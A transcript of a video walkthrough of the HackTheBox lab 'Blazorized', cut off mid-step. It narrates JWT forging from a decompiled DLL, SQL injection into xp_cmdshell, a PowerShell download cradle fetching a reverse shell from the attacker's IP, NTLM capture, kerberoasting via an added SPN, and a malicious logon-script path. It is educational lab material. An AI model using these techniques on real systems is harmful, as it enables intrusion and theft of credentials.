What's going on YouTube? This is IPSec. We're doing Blazorized from HackTheBox, which the foothold involves exploiting a website coded in Blazor, which is a weird .NET WebAssembly thing. If you're new to WebAssembly, it's hard to wrap your head around this because typically browsers use HTML and JavaScript to display websites, but WebAssembly uses binary programs. And because so much processing is being done on the browser, not the server, a common vulnerability is sensitive information ends up being sent to the browser. And in this box, we're going to decompile a .NET DLL with ilSpy and discover the JWT logic, including secret, is sent to the client. So that will enable us to create our own JWTs. There is a second website that's also coded in Blazor, but this one doesn't lazily load DLLs, so you can't just decompile the entire thing. So this makes it much more difficult to understand the logic. If we try to use the JWT to authenticate by placing it in the authorization header, it just doesn't work. But if we examine the web request between the client and server, we can see the server is instructing the client to retrieve the token via local storage, and presumably it sends the data over the Blazor protocol, not HTTP headers. So that's how we authenticate to the admin application. From here, we can get a foothold via SQL injection with XPCMD shell. And then there's some Active Directory exploitation that enables us to escalate to root. The tough part here is the final step involves a weird AD permission that isn't in Bloodhound, so you have to go back in time and use older tools like PowerView to enumerate domain ACLs. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats in the nmap directory and call it Blazorized. Then the IP address of 10.10.11.22. This can take some time to run, so I've already ran it. Looking at the results, we have 13 ports open, the first one being DNS on port 53, and the banner tells us it's simple DNS plus, which is the default for Windows Active Directory servers, so I always scroll down to confirm. And yes, we do have LDAP open, and it's exposing the hostname Blazorized.Htb. So I'm going to go ahead and add this to my host file, so do sudo v etc host. And then we can add 10.10.11.22, Blazorized.htb, save that. And let's take a look at what else we have. So we have HTTP on port 80, and that's Microsoft IIS, and it's redirecting us over to Blazorized.htb. So we already added this to the host file. We don't have to do anything else, but when we check out the website, might as well just go straight to this host name. The next thing we have is kerberoast. It's just leaking the server time, nothing too interesting. MSRPC, there's LDAP. Doesn't look like anything too interesting. We do have Microsoft SQL. So if we have credentials, we have a second way we can potentially authenticate to the box through MSSQL. Let's see. And then we have LDAP, which we already saw. So nothing too interesting. Our clock is about 21 seconds off from the machine. So again, not interesting there. It is giving us the hostname DC1, so we could potentially add this to our host file. If we wanted to, we could also confirm the hostname with something like netexec. So netexec SMB 10.10.11.22, and this will connect to SMB and tell us the hostname of the box, which yes, it is DC1. So I'm going to go ahead and add DC1 Blazorized.htb just in case for some reason we need that domain name. And let's take a look at the website. So I'm going to go to HTTP Blazorized.htb. And we see a website. It's built with Blazor WebAssembly. And I don't know that much about Blazor WebAssembly. It's a little bit of a pain to interact with just because everything that goes between the client and server is going to be serialized. We can click around, like clicking on Markdown Playground, and see what's going on here. If I type, it's instantly going down on this rendered Markdown. So let's see. Task, that's a title. So what I want to do real quick is open up the, I guess, developer tools or whatever. We do see it loading a lot of DLLs, but the main reason I want to do this is see if there's any connections going between when I type this and the rendered Markdown. I don't see anything, so I'm assuming this is all done via WebAssembly or JavaScript. So like there's no real attack surface here because I'm not sending data to the server. It's just my web browser automatically rendering Markdown. So that's not that interesting. If we click here, we have failed fetching data from the API of Blazorized. If I look at where it's requesting, let's see, do we see anything? We will want to look at all these DLLs that will be loaded eventually, but we do see a request to api.blazorized.htb. That fails, so let's go ahead and add this to our host file. So we can add API and not all that. Oh man, DC1, Blazorized, HTTP, and then API, Blazorized, HTTP. There we go. Save it. Refresh this page. And let's see, do we now get any content? So it looks like we do. And here we can intercept, and since we're sending data to the server, this is where we can start seeing it being a little bit of a pain. So I'm going to send traffic. Let's do intercept response. Does it come back with anything? It's just HTML that says please loading. Let's see. I think we're going to load a lot of DLLs. Let's just go to HTTP history. Let's see. And it's not sending anything that I expected. This is easy to look at, right? We just make a GET request here, and it sends some markdown back. We could try like using typical SQL injection things. So if I do a single quote, we have is not this is not a valid for GUID property. So it looks like they have some type of schema enforcement. I forget the exact terminology, but if we send invalid characters that it's not expecting, it's just going to reject us because it doesn't pass whatever checks it's doing. So I'm not going to really look at SQL injection here because it looks like it's just going to accept digits, characters, and dashes. A single quote just makes it error right away. I wonder if it does uppercase. Uppercase does work as well. It's just special characters it doesn't expect. So this is going to make it tough to do any type of SQL injection, right? We can try to play with things. The dashes don't really work. We'd have to like escape the quote, which maybe double quote could work. Let's try this. Let's URL encode this. Convert selection. Where are you? URL. There we go. Still not a valid property. So again, because it's doing that strict enforcement on the parameter, we know we can't really get any type of SQL injection working there. So we didn't click on check updates. So looking here, we can read this. Because it's in the alpha release, only super admin can request all posts and categories from the API. However, if we click the button below, we can temporarily and securely fetch all the post and category updates. So let's take a look at exactly what this looks like. If I click on the check, it's processing, and we have updated Blazorized contents, and it looks like it loaded some papers here. And there is one interesting thing about this page before you look at the exact request it makes. If we load the page and look at the very last thing it loads, it's going to load this Blazorized.Helpers.Dll, and no other page loads this. If we looked at the network tab and looked, it just would not be loaded. So this is definitely an interesting page, and it's loading this DLL most likely because it's impersonating the user, right? So this is where I wanted to really look at exactly what was going on here. So we turn intercept on, click check for updates, and we should get a request. So we're doing an options on post. And then we have this request and we have a authorization token here. So let's take a look at exactly what this is. This looks like a JWT. I always like just going to jwt.io to view it. We can turn Burp Suite off to view this page. Paste this, and we can see the schema. So we got the email address of super admin, and then we got the role of post get all and categories get all and expiration date. Looking at this, it looks like it is probably 1 minute in the future. Today is November 7th, and this expires 12:55. Looking at the clock, 12:54. So the ticket's not long. The tokens doesn't have that long of a lifetime. And we can see the issuer and audience. So we need to get the signing key so we can potentially manipulate this token, right? And this is where I said it loading that helpers becomes interesting, because if we looked at all the other pages, it never sends this authorization header. So by loading the helpers.dll, it's likely going to have some type of code there that generates the header, and that's why this file becomes interesting. Really should not only look at all these files, like there's a few like Blazorized, local storage DLL, that should be interesting. Digital Garden, shared, like you should analyze all of these, but if we did that in this video, it would be hours long. So This is the one that really stands out to me, just because, again, it only loads on this page. So let's curl it. We can call it Blazorized.Helpers.Dll. And the other thing I would be doing, oh, I mixed up the arguments. There we go. The other thing I would be doing is also a dir bust. If we look at it, it's loading DLLs out of this _ framework directory, right? So the first thing I do is check if this is an open directory. If we can just see every DLL in here, it doesn't look like we can. It just redirects us to the main application. So nothing interesting there. But I would be creating a word list, like using fuff, and then putting every word here, or not in the first one, on the second one. So I do like fuff-u, and then copy this, .fuzz.dll, and then get a word list that has a bunch of titles, and see if I can find any other DLLs that exist in this directory that just aren't being loaded, because maybe there's a DLL that's not exposed that is helpful to us, right? So that is one thing I'd be doing, but it doesn't lead anywhere, so I'm not going to show it in this video. So we have downloaded that DLL. If we look at it, we see it is .NET, and I'm going to run ilSpy, which will just decompile this and show me the source code. And there's something interesting I just learned about ilSpy. It's cross-platform. Normally in my videos, you saw me like switching over to Windows. But if we go to the ilSpy repository, it does talk about it being cross-platform. And if you scroll down, let's see, the Linux, Mac, Windows UI is based upon this. And if we go to this repository and download the release, we'll download a version that will actually be able to work on Linux, which is pretty cool. So no longer have to switch VMs. So I've already downloaded ilSpy. I will just go and execute it. And then we will open this DLL, and then we'll be able to see what it contains. So let's go HTB, Blazorized. Oh, it does not like that. That's annoying. Normally you can just type in the navigation bar and then it'll open a directory, but doesn't look like it. So HTB, where is Blazorized? There we go. Helper. And I can't make the font bigger on this left side. That's really annoying about this application, but hopefully you can read everything that's going on. I'm going to click on the Blazorized helpers. And then we have a few functions. We have categories, JWT, passwords, and post. If we look at passwords, it's just going to generate a random password. There's nothing too interesting here. If we look at JWT, we have the expiration, which is 60 seconds. We have this symmetric security key, and this is actually the signing key. If we go back to jwt.io and then we paste the signature in, we can see it says signature verified, and it didn't change any of this. So we know we now have the signing key for the JWT. Now the next thing is, where does this go to? How do we get more access, right? So we can see a few claims. We have post get all, categories get all, and then a super admin, and I'm keying in the word claim, right? Because the claim is right here. So we could add ourselves a super admin role. So we do super_admin. Now our JWT has that claim. We have the issuer, the API audience. We also have the admin dashboard audience, which gives us admin Blazorized.htb. So we can go ahead and add this to our host file as well. So let's go and add, that's not it. There we go. Save that. So we added that to our host file. So now we can request a page on HTTP, admin, Blazorized.htb. And it's going to attempt to authorize us, and then we get this sign-in page. So if we look at the functions for JWT, we have this generate temporary, and it's going to give us the claim, the email, which is the superadmin at Blazorized.htb, and then adds the two claims, which is post permission and the claim value. If we look at the other function, the superadmin JWT, it's going to only put the superadmin role claim value, which was super_admin. So if we go back to our JWT, we've already added it. If I was doing like a red team engagement, I would definitely take these two claims out, because if someone's examining JWTs and sees a JWT with extra information, it may stand out more and you may get caught because that's now an anomaly. I would also make sure all my expirations, I would look at what the default is here. Looks like it's 60 seconds. So I'd have like a Python application changing my expiration to only be a minute ahead of time. But since we don't really care about getting caught, we can leave those two claims in. And I'm also going to change this to be an 8 here. So we changed the time to expire multiple years from now. Now it's going to expire in 2028 instead of being already expired now. So we have this JWT. We have to know how to use it, right? And if we looked at how the application used it in the past, it just put this authorization header. So let's try that. I'm going to save this over into repeater so we have the request later. So if we turn intercept on, make sure burp is on, refresh the page, then we can start adding this authorization header. Let's go to repeater, grab this. Let's just paste it. And this is a bad JWT we have. So we'll replace that with our admin one. Paste this. Then we can copy it and then forward. And it'll be a big pain because it's going to download like every DLL again. And you don't want to have to do this for every request because there's like hundreds of them, right? So what I'm going to do is go into proxy settings. And then we're going to scroll down to this match and replace rule. We're going to add to the request header. If we leave this blank, it's just going to append it. And I'm going to put the header we want to add on the replace. Click OK. And scroll down. That is in place. So now I just do it for this one, but all future ones will have the authorization on the bottom of the token, right? So as long as we're going through Burp, it's going to add that authorization header. And let's see, we're super admin sign in. It doesn't look like it works. So that's not how this application appears to be authenticating, or maybe it has a different secret. I don't know exactly what's going on here yet. So let's go and try to intercept or view what is happening here. We could look at HTTP history, but this is going to be where I was talking about where it gets like serialized and hard to read. You can kind of make sense about it, but we can go to the extensions option of Burp Suite and install. Let's see, where is the search? I'm going to search for Blazor. We got this Blazor Traffic Processor, so let's install this. There it is. And it adds this BTP item to us. And if we look at it, I think things have to be in scope. Let's see. Primarily includes, I think it has to be in scope for it to work. Let's see, proxy history. Yeah. So I'm going to right click. We can add to scope. Yes. And what is my scope now? Target, add, add, add. Okay, so we have all the domains added to scope. And then if we look at the proxy tab, it should be highlighting the Blazorized traffic, but it's not. Let's refresh. Maybe it only works on new request. There we go. So anything time like this plugin can be used, it's going to highlight the item in blue. And we can go to a thing that has a lot of data like this. And then we can right click, extensions, traffic, send to BTP, and then we can deserialize and look at it, right? The other thing I noticed when I'm looking at this traffic is our sequence numbers skip things, right? We have 262, then we go to 265. There's a lot of requests we just aren't seeing. And one of those requests is actually going to be important. So I'm going to go to my filter and let's just show everything. I'm going to start with other binary, then I do CSS and images. If I click apply, now we have some more requests here. So let's look around to see what we have. And the main thing I'm looking for is what the server instructs us to do. Right here, we have it going to local storage has property is dark mode. Again, it may be hard to read unless you send it to the BTP tab and then click, you can deserialize and it says it's going to begin invoking JavaScript and then it's getting dark mode to see if we have dark mode enabled. See, is there anything else that sticks out? So this is, again, doing more dark mode things, I believe. Let's see, is there anything else? This one is big. We got dark mode there. I'm going to send this one over to BTP to kind of look at exactly what's going on. Again, you don't need to do this. I just find it to be a lot easier to read this way. And we have one, it's going to local storage get item JWT. So it looks like the JWT is stored in local storage, not the header of a request, right? So what I'm going to do is go to my local storage. So we'll do F12 again, storage, local storage. We're going to create a item. We'll call it JWT. And I'm going to give the value. So let's just go back to our proxy settings. And I'm going to grab the JWT out of here. I could have also just went and got it from jwt.io, but we can copy this. And let's see, go back to the browser, put this here. So now we have our JWT in the local storage, refresh it, and let's see what happens. It's authorizing, and we get authenticated. So that is how it wanted it. So now we are super admin, and it's talking about the API speaking directly to the database. So let's click around to see what we can do. If we click on Manage Post, we have a few buttons we can edit. And if we try to edit, it says it can't update. It's not implemented. Can't delete either because it's just read only. We go to duplicate post titles. Let's see. Currently, Blazorized allows duplicate post titles. Therefore, you can use the form below. I'm guessing this means does not allow to check whether it's been used. So I'm going to create a post. Let's see. Please subscribe. Does this post exist? It says it is not used. If we do a single quote here, click check post title, we don't get any response back. If we do a comment afterwards, now we get it. So this is indicating we probably have some type of SQL injection, right? One thing I did play with, which I had trouble with, is trying to see like exactly what was going on under the hood. So I'm trying to let Burp calm down. I think whenever I move the mouse, it sends requests, which is annoying. I'm going to check, go back here, and then we want to look for where I sent it, please subscribe. Let's see. Maybe that's telling us what to do. Let's see. Post here. Is this where I say, please? I think this is mouse moving. It looks like it is. There we go. This is the request where I send it, please subscribe. And then we can go look at a few requests where it sends us data. We got data back right here. I'm guessing this is going to be what popped up the menu for us. So I can go send to BTP, deserialize. We can kind of look at what happens. Nothing really fully makes sense to me here. So I want to see what happens on an error because I want to know, like, do I get an actual error message back? Because getting error message back is super handy. And long story short, I can't really make sense of it. Maybe it'll make sense when I'm doing the video and something will pop out. There we go. We said, please subscribe again here. And then we get this shorter batch. So before the response, it had a lot. It told us to pop up a div or something. But here, it's just like saying continue, doesn't really do much. So long story short, it's hard to detect the SQL error when we're just looking at network traffic, but based upon how the application is behaving, that's what tipped me off, right? So if we do a comment, it works. And this is Microsoft SQL, so it normally allows for stacked queries. So I'm going to do a semicolon and then a comment. That still works. So now we can do a second query, right? I'm going to do a exec xp cmd shell, who am I? And then we'll do a semicolon comment. And let's see. We get response back. So my first thing is a ping on myself. Let's see if we can. If this doesn't work, then I'd try something like enabling xp cmd shell. I bet if you go like hack tricks and Google it or ipsec.rocks, You'll find out how to enable it. I'm assuming it's already enabled, but we'll see. We'll do sudo tcp dump ton0 icmp, check post, and we get pings back. Awesome. If that didn't work, let's see. Let's Google it real quick. HackTricks MSSQL. So I would definitely read this page if you suspect you have like Microsoft SQL injection and it's not working. This would be generally something good to read. I think there's like advanced. So I'd like run this sp configure, reconfigure, and then enable it. So these are the commands I would be running if the xpcmd shell didn't work right away. We could also use responder at this point and potentially steal a NTLM hash and then try to crack it. So if we do sudo, do I have it installed? Let's see, responder. Let's see, -i ton0. Awesome. Let's go back here, check post. I want to say it's like XP Directory to list directories, right? And we could do 10.10.14.8, and then we'll say share does not exist. The key thing we're doing here is having it make a SMB connection back to us because it attempts to authenticate, and when it does, we can potentially steal a hash, right? So we see the MSSQL server is running as NU_1055. If it ended in like a $, I wouldn't even bother trying to crack it. In this, if I didn't have xpcmd shell, I would definitely try to crack this NTLM hash because it could let us potentially log in, right? So now we have that. Let's now get a shell. So we can do xpcmd shell, and then I'm going to run a PowerShell command. So let's set up our interface. So we'll make dir dub. I'm going to copy user share. Forget what it is. Let's see. I think it's laudanum. CP user share laudanum. Nope, that's not it. Let's see. I can't believe I'm forgetting the location of this. Reverse TCP. User share grep ps1. Nashang. Wow. User share Nashang. Shells invoke PowerShell TCP oneline.ps1. And we're just going to call it rev.ps1. There we go. I can't believe I forgot the word Nashang for a couple minutes there. Let's see. Let's do 10.10.14.8 to send it back to us. I like using port 9001. There we go. And then one thing I always like doing when I use web shells is create some type of web cradle that then executes it, because if antivirus is running, it's hard to know if we just encode the shell and send it right away. But if we do a web cradle and it requests the file for the shell and then doesn't give us the shell, we know most likely antivirus blocked it. So that's why I'm going to create this web cradle. So we can do new object, net.web client, download string, HTTP 10.10.14.8, 8000 rev ps1. There we go. So I convert, let's cat cradle, convert it to UTF-16, little endian. There we go. Base64 W0. So now we have this string. Let's start up a web server. So we'll do Python 3, HTTP server, or LRAP, NC LVMP 9001. Go back to the website, and we can run PowerShell-ENC for encoded command, paste in this base64, and when we check duplicate titles, we see it makes a request back to us, and then we get a shell. So there we have it. We're now on the box as NU1055. And I always check whoami/all to see if I have like the SE impersonate privilege. I don't, so I know it's not going to be like vulnerable to some type of potato or something like that. The next thing I normally look at is the web application config because we know this uses a database, so there's probably a credential stored, right? So let's go find where that is. On Windows, it's probably gonna be like inetpub www root. And then let's see, we probably want the admin. So let's go to Digital Garden admin because this is one that was definitely talking to the database. There's web.config. So if we look at this, it doesn't look like there's anything interesting there. If we scroll up, there's also appsettings.json. So let's try looking at this file. So we'll type it out. And it doesn't have any credentials. It's just going to use the context of the local user, something handy that Windows does. So we can't really get any credentials out of here. So the next thing I'd probably do is run SharpHound and just look at the Active Directory configuration, right? So let's do SharpHound GitHub, and we'll just download the latest release. And I'm going to use SharpHound, not like the Bloodhound.py, because we don't have any user credential, right? So if we use the executable, it can actually run in the context of our local user, kind of like how that application is talking to the database. And that becomes very handy for us. So let's go and www, move, downloads, SharpHound here, unzip it, and then we want this executable. So we can copy this, go back to our shell, curl, HTTP 10.10.14.8, 8000, SharpHound, and we'll call it sharphound.exe. That looks good. And then when we try to execute it, it's going to dump everything in a file. And I actually probably want to download, I like doing -c all. I'm going to delete this real quick because I don't want to accidentally copy this file. Normally when I run it, I like just specifying, grab me everything. Not the most stealthy, but for CTFs, it's really great. So now we have the file. We don't have write access into IIS. I'm not going to show that because it's just a waste of time. We could stand up an SMB server and copy it back, but that becomes kind of a pain because we have to give ourselves a credential because anonymous SMB is disabled on a lot of Windows boxes. So that's some of a hassle. My favorite way, though, to copy files, and I haven't shown it in a long time, is just through standing up a simple WebDAV server. So I'm going to go in my Etsy nginx, sites available, and we're going to make a file. I'm going to call it WebDAV. And then we're going to create a quick config. So we'll do server listen 9001 on default. Let's see the server name. I'll call it ipsec.rocks. This thing doesn't matter. We probably shouldn't list it on 9001. I'm going to list it on 8001. There we go. I just didn't want 9001 because that's where my shell is, right? I'm going to say the location is going to be root is var www upload. And then we're going to enable the dav methods of put. And then we will close this out. I think that's all I need. So we'll do sudo make dir var www uploads, sudo chmod. I'll give it read write permissions. If we do var www, everyone can read and write to this directory because I'm not sure exactly what user is going to be running as, probably www data, but yeah. So we'll do sudo systemctl restart nginx. And let's see, it failed with errors. We probably have some type of issue, right? What did I screw up? Listen, server name, location. That all looks good. Oh, I didn't enable it. So we just put this in sites available. Let's go sites enabled, sudo, create a symbolic link. nginx, sites available, WebDAV here, restart, and still failing. I'm going to remove the default. Okay, that works. So something probably was just erroring in my default config. I'm guessing it's probably listening on a port that I was already listening on. Let's see, what does default look like? Server 80, SSLNTP, grep on 80, ton 0. Something is listening on 80. Not, oh, it was failing because responder is listening on 80. So that's why it was failing. I had responder running, so the default couldn't open that port, but that doesn't really matter. We have the server on 8001 listening. So if I go to cd var www uploads, I'm going to sudo chmod plus x. We actually want to be able to execute because that lets us enter the directory, right? So let's go back to our shell now. And we can use a invoke web request, specify the URI, HTTP 10.10.14.8, 8001, and we'll call this bh.zip. And we want to say the method is put, and the in file is going to be c:\program data, and then what is the file name? Right here. There we go. URI there. Hit enter. And then if we go to this www uploads directory, we actually do not have it. Method put in file. Sudo chmod 777 for www uploads. Restart. Run this again. We screwed something up. Sudo tail var log nginx access.log. See. That is just now. So V, it's giving a 500 error, which is an error message. Do we have anything in error? Oh, I have plural and not. So it helps if the file names are correct. So let's do V, Etsy, nginx, sites available, WebDAV. We put it in uploads. Like that. Restart. Now rerun it. And we have the file. Okay, all is right. That's embarrassing, but hopefully that little troubleshooting helps you, because that's a mistake I find myself making somewhat regularly. So when we restarted nginx, I'm just going to stop it. Let's do stop nginx, because I don't want to leave this web server running. I don't think it'll actually cause any problems. It's just an upload on this directory. I don't think it could cause problems, but always good to disable a service when you're done with it. So now that we have the Bloodhound data, we want to run Bloodhound. So let's do cd opt Bloodhound, examples, docker compose, and then I'm going to put Bloodhound _ port is equal to, we'll do quad 8s. If I don't do this, Bloodhound's by default is going to listen on port 8080, which Burp Suite is listening on. It creates all sorts of problems. So that's why I'm doing that. And then we'll do docker compose up, and this will start Bloodhound for us. And it'll probably take a couple minutes for all the containers to spin up. So I'm probably going to pause the video and we'll come back when it's up. If I do localhost quad 8, fail to connect. So we got to wait for the container to come up. Okay, I think everything is started. So if we refresh, we're going to get this error message and we see authentication is invalid. And this is because of something we did earlier on that is screwing Bloodhound up. If we go to our proxy settings and we disable this, because we were adding the header authorization, that's what was actually screwing us up. Bloodhound was seeing an authentication token and then failing off. So disable that and we can access the Bloodhound page. So I'm going to do spam@example.com, which is the default username. And then I set the password to password 2024 exclamation point. If this is your first time running Bloodhound, the password's going to be somewhere in this text. If you look at my missed video, I have it marked on where I start running Bloodhound, so you can just follow those steps to get it all set up. But once you get logged in, we should be able to upload data. So let's go to the data collection page. That wasn't where I wanted to click. Let's just do settings, administration, file ingest, upload files. And then we'll do var www uploads bh.zip, upload it. And then this will probably take 20 or so seconds to upload and ingest. We see the status is now running. I wonder if I just open a new pane. Let's go to explore. Do we have data? No data available. So I guess I should pause the video and wait for this to finish uploading. It may take longer than 30 seconds. So I'm just hung here, and I think I know what the problem is. So I decided we'll start recording again. This is just indefinitely hung, I think. I think the issue is if we go back to var www uploads, we actually don't have read access to bh.zip. So let's give ourselves that. So we'll do sudo chmod 777 bhzip. Okay, so now we can read this file, and let's try uploading it again. So we go to uploads, upload it. It says ready, done. Like that went much quicker. That is what I was expecting. Now, I don't know if Bloodhound's going to be hung up because it's still stuck ingesting something. Like, I don't know if it's waiting for that ingestion to finish before it starts the next one. Hopefully that's not the case. No data available. Maybe I should just clear the Bloodhound data and then try this again, because this definitely seems like it's hung. So that's what I'm going to do. Let's clear the database and try again. Oh, wait, nope, analyzing. There we go. So it is working. It's just taking long. There we go. It is now complete. And we should start having data. So let's look at what user we were. Who am I? We are NU 1055. So let's search on this user. We're going to mark us as owned. And then I always like looking at outbound object control because this shows us what this user can do. And if we look at it, we can write the SPN to RSA 4810. So when we write the SPN to a user, it's going to enable us to kerberoast them and potentially crack the password. If I click on this, let's see, Windows abuse, convert to, set domain object. Yeah, so it's using set domain object, which I think is part of PowerView. So let's do that. The reason why we're not going to be using Linux abuse is, again, we don't have the credentials to NU 1055, so we can't use Impacket because we need to authenticate somehow. So let's get PowerView. So do PowerView GitHub. And whenever I use PowerView, I like getting the development branch. So we're going to copy that. Let's go back to our web server, git clone -b dev. I should probably just put this in /opt or something, but it's fine here. So we want to go in PowerSploit, Recon, and PowerView PS1. So we're going to go with IX, new object, net.web client, download string, HTTP 10.10.14.8, port 8000, PowerSploit, Recon, PowerView.ps1. So that's going to load PowerView, right? There we go. Yep. So now we should have the functionality. So write SPN, Windows. We want to do set domain object. Okay. Before I do set domain object, let's actually get a list of all the SPNs so we know we're actually adding it. And that PowerView is loaded. We could just do invoke kerberoast, and that will give us all the potential hashes for accounts that have SPNs. We could also get domain object, then identity. The user was 4810. And this is going to list all the permissions. We can select, what is it? Service principal name. And we don't have anything. So let's do a set domain object, because this user supposedly can create one, right? So we'll do identity and then set the server principal name is equal to, we'll call it please subscribe. It really doesn't matter what we set here, as long as we have that. And then we invoke kerberoast again. We don't have anything. Let's see, get domain object. Do we have a service? We don't. Maybe we have to do like dash properties star. Select service principal name. Let's see, set domain object, identity. I have a space here. There we go. That's what I expected to see. Invoke kerberoast, and we get the ticket, right? And if we do this get domain object, we can see we set the service principal name, and that's why kerberoast suddenly is working. So let's copy this. And this is going to be a pain to grab, probably. Let's see. Let's just exit that. Let's call this RSA 4810.hash, I guess. Paste. And let's see. Let's get rid of all spaces. And I think we have to put this all on one line for HashCat to like it. Let's see. I'll copy this over to the Kraken. What do I want to copy it to? CD hashcat hashes. Yep. There we go. So we have the hash here. Let's do /hashcat hashes RSA. And then the word list will be opt word list rocku.txt. And see if it auto detects it. If not, we probably have to erase all the line breaks, which will be slightly a pain. 6 hash modes. Yeah, so let's go ahead and erase all the line breaks. The hashes RSA. Then we can do a search for all new lines, replace it with nothing. And that looks good. Let's try running hashcat again, and hopefully it detects it. If not, I think there is an option to change the output format, but no, it looks like it did. What I was going to say, in the actual invoke kerberoast command, there's a output format. You can specify hashcat there potentially, but it looks like hashcat now detects it. And if we look, it cracked the password, which I'm surprised is in rocku. That is a long password. I wonder if these parentheses are part of the password. It's there because we have a space. I'm guessing this is the whole password. So let's go back up here. R84810. Let's see. We can mark this user as owned. And if we look at execution privilege, they can PS remote. So we can use evil winrm. So we can do evil winrm -i 10.10.11.22 -u rs a 4810 -p, put in this password. And let's see, we do get authenticated as them. So if we do whoami /all, whoops, /all there, We can see what groups we're a part of and whatnot, but there isn't really much information here. Additionally, if we looked at Bloodhound and we look at what permissions we have, so we go what we did before, there is no outbound object control. And this next piece is relatively hard to find because it's not a default in Bloodhound, but it is a Active Directory permission that this user can do. If we went back to PowerSploit, and I'm going to do this from this web shell just because it's already got PowerSploit loaded in it, there is a command called Find-InterestingDomainAcl. And I like adding the resolve GUIDs. And we could also specify something like this. And this isn't normally how I run it. I'll show how I normally run it after this. But a lot of people like doing the identity reference name -match and then the user. So we'll do RSA, what was it, 4810, like that. And this will show us interesting domain ACLs that this user can do. And the reason why I normally don't run this command like this is, as you can see, it takes 20 seconds for the command to run, and you only get one result, right? What I like doing is just running the entire thing, converting it to JSON, copying it to a file, and then using JQ on my host machine in order to parse it. This is taking longer than I expected. I wonder if I screwed the command up. It looks fine. So normally just doesn't take this long. Oh, there we go. So we can see the user, RSA 4810, has the write property on the script path of SSA 6010. So we can write pretty much login scripts to this user, right? But I'm going to take a step back real quick. We're just going to do this, and then I forget how they do convert. Is it -to JSON PowerShell, or is it convert to -JSON? Let's see. Convert to -JSON. So if we just ran this, and this will output everything in text, and then we can copy and paste it and then use JQ. We could have also directed it to a file, then use WebDAV to upload it, just like we did with the Bloodhound zip, but it's too late for that. I already ran the command, and we're waiting for it to give us the results, which could be a minute or two. Okay, so now that it's ran, let's just copy everything here. And it is quite a bit of information, right? This is why it takes so long to run, but having this all means we can then query it instantaneously. We're almost to the top. There we go. And let's see, that's the kerberoast invoke. Grab this. And then I'm going to call this like acl.json, or we'll call it like domain ACL. That's probably better. Paste that in. Then we can just cat this file, pipe it over to JQ, and it opens up with a list. So I'm just going to put that to put everything outside of that list. And here we could now write like select statements if we really wanted to. So we could do select identity reference name is equal to, was it like RSA 4810? Was that it? And the single quote, and we can see what that user has access to, right? They have the script path. If you didn't want to use the whole like JQ select statement, we could get everything. It's important to get out of the list. Then you can specify -C. It puts it all on one line, and then you could grep it for our, what is it, RSA 4810. Then JQ, and this will get everything about 4810. We can see the identity reference name. This user can access that. But if we go up, we see the super support administrator has replication get all privileges on the user. So this is another group. This will be like the inbound permissions, right? This user can access 4810, and 4810 can go. Before I continue that thought, yeah. So that's just showing all the inbound, right? We don't see any outbound here again because Bloodhound isn't looking at that script path thing. NU 1055 was the other user. So if we wanted to, we could look at this user and see what it looks like in Bloodhound. So looking at this, the subject user, the identity reference name, has validate SPN over 4810, right? That's what we saw in Bloodhound. Go here, look at outbound, right? So that's that. If we wanted to, we could look at inbound, see everything here. And again, if we just did the grep like we did before, so we're not just going on the identity reference, we'll see everything here. So NU 1055. So again, super support administrator has replications get all. Let's see where that is. Probably generic all. Account operators. See, there should be a support super, right? I'm actually not seeing that here. I thought I would, but using both is good. Bloodhound works like 90% of the time. There are edge cases where Bloodhound's not going to show it. In this case, it is going to be writing the script path. And honestly, like maybe it's because I've never looked, but I don't know many cases in a Windows domain where a user would have access over this write. So maybe that's why it's not in Bloodhound. But we can write to the script path. And in Active Directory, this is login scripts. So I wonder if we can do a get domain object identity SSA 6010 properties star. Is it going to be, I'm not in my reverse shell with PowerSploit. See. Script path. I'm not even sure exactly how to pull that. I wonder if there is a user that has script path set, but this doesn't look like it. There could also be a different way to do property star, but I think that's right. So let's try writing something there. And before we write something to the script path, we'll have to find a writable directory where we can. And script paths always go off of the SYSVOL directory. So if we went to netexec, let's see, nxc-u, SMB 10.10.11.22. Let's see, what is the account we had access to? It's Bloodhound. Blazorized.NU. I could have swore we had a password somewhere. Not there, not there. Oh, right here. So we have this account's password, and that is RSA 4810. So RSA 4810. So if we look at shares, the script has to be somewhere in SYSVOL. And in Active Directory, SYSVOL is most likely going to be stored under the Windows directory on domain controllers. So if we go cd/Windows SYSVOL, let's see, we're here. So we got domain, staging, SYSVOL. It probably wants to be in domain, right? I don't know exactly how this is structured. Policy scripts. If we do scripts, it's probably going to be like one of these directories we can write to. But if we just go in this and blindly, let's see if we can just echo 1 to test.bat, unauthorized. So I'm going to use a tool called AccessChk, and we're going to see any directory we have write access to in the SYSVOL. So I'm going to go back in program data, and then we're going to grab the tool, so AccessChk, and this is going to be a sys internal tool. So it's from Windows that will never be flagged as malware or anything. So we can download this, accesschk.zip. Let's see. Move, downloads, AccessChk, extract it, and we want to run AccessChk 64.exe. So we can do a curl HTTP 10.10.14.8 8000 -o. There we go. And on this page, it's going to tell us all the arguments, right? So we're going to specify -u to hide error messages. Then we'll do -w for writable. Then a -d, that's going to filter for directories. And then S is going to be recurse, so we go into all the directories. So we're going to do /AccessChk 64, except EULA, UWDS, Blazorized, BLAZ, yep, that looks right. The user, RSA 4810, and then the directory. So we want to do C:\Windows, where was it? This directory. Okay. And it's running, and looks like we have read-write over a lot of directories, but everything is the parent directory of this A2, like A32FF. So in this directory is the one we can write in. So if we go CD /, let's just go here, CD, there, echo 1 to test. So we can write in this directory. So what we want to do is write over the script path of the user. And to do that, we're going to use PowerSploit again. And we have to do it from the 4810 user, not this NU. So I'm going to copy this so we can load PowerSploit. I know EvilWinRM has some magic way. I think I just screwed something up by doing that question mark. Does it help? Like EvilWinRM has some tool to like magically load .NET scripts. I don't know it though. And trying to pull up the menu made things go wonky. I'm just going to load it like this. Let's see. We have to do it this way. So PowerSploit recon. Let's see. I think this is what it truncated off. There we go. And this should run. I think maybe help does it. Nope, that's PowerShell help. I don't know exactly how to do it in PowerSploit, EvilWinRM. But now we have it loaded because we loaded PowerView this way. So what we want to do now is set AD user, identity. What user do we have that over? Let's see. JQ. Where was that JQ command? Let's just run it again. Cat domain. Oh, here it is. Sweet. JQ. There we go. 6610. So identity, SSA 6610. Script path, and we're going to want to write to this /rev.ps1. So we're setting the login script for 6010 to be rev.ps1, and then we'll have to make sure that file exists. Or lwrap and c lvnp 9001. Okay, curl HTTP 10.10.14.8 8000 rev ps1. Okay, that works. So if that user does log in, they should hit our login script, which will send us a shell. So let's do that get domain object 